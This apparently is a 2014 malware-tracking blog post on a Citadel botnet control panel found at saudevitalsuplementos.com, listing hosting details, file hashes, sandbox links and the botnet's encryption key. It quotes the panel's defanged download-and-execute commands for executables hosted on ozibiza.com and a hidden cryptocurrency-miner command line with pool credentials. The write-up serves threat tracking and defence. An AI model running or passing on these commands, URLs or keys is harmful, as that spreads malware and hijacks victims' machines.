Friday, May 9, 2014

saudevitalsuplementos.com - Citadel

Citadel botnet
https://zeustracker.abuse.ch/monitor.php?host=www.saudevitalsuplementos.com


saudevitalsuplementos.com
200.98.197.107
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.


Login:



Home:
(15 bots)



Scripts:




Scripts :
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/musics/musicse.exe
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/imgs/setup.exe

https://malwr.com/analysis/MGU3OWU5MmIwYjkzNGY4MzkxYjQxZjUyODljMTFkZjA/
https://malwr.com/analysis/ZWU1NTM2NTZhOTI2NDQwZTk5ZTQ2YmM3NjJjNzQ0NDk/


b6e0e6bf92456476d0d1d813274192b0 
drops this: 8FEE9A2354B3646A94DAEDB08B731DDA  
(this binary has code for a miner found here: http://ufasoft.com/coin/) 
Command line:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe -o http://super777.truemyenergy:x@dog.ltcoin.net:8016 -t 3 -T 83 -a scrypt -g no -I 0

cf9ea8b950fce64b5f37212f1d34e3fd (VT 35/50)


These MD5s are all over.
Russian file names like "VKontakte" (Russian Facebook)


Encryption Key:
78fghrYU%^&$ER

Same encryption key observed here:
http://protectyournet.blogspot.com/2014/05/saudeodontoscombr-citadel.html

No comments:

Post a Comment